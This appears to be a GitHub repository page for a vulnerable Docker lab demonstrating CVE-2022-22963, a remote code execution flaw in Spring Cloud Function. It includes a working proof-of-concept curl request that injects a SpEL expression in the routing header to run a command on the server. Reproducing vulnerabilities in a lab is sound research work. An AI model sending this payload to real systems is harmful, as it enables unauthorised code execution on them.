Spring Cloud Function Vulnerability(CVE-2022-22963)

Vulnerable Application to CVE-2022-22963

CVE-2022-22963 Exploit Demo

CVE-2022-22963.mp4

Build

docker pull me2nuk/cves:2022-22963
docker run -it -p 8080:8080 --name=vuln me2nuk/cves:2022-22963

POC

curl -X POST  http://0.0.0.0:8080/functionRouter -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("touch /tmp/pwned")' --data-raw 'data' -v
docker exec -it --user=root vuln ls /tmp

Name		Name	Last commit message	Last commit date
Latest commit History 9 Commits
CVE-2022-22963_Demo.mp4		CVE-2022-22963_Demo.mp4
Dockerfile		Dockerfile
README.md		README.md

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

CVE-2022-22963_Demo.mp4

CVE-2022-22963_Demo.mp4

Dockerfile

Dockerfile

README.md

README.md

Repository files navigation

Spring Cloud Function Vulnerability(CVE-2022-22963)

CVE-2022-22963 Exploit Demo

Build

POC

Reference

About

Releases

Packages

Languages

me2nuk/CVE-2022-22963

Folders and files

Latest commit

History

Repository files navigation

Spring Cloud Function Vulnerability(CVE-2022-22963)

CVE-2022-22963 Exploit Demo

Build

POC

Reference

About

Resources

Stars

Watchers

Forks

Languages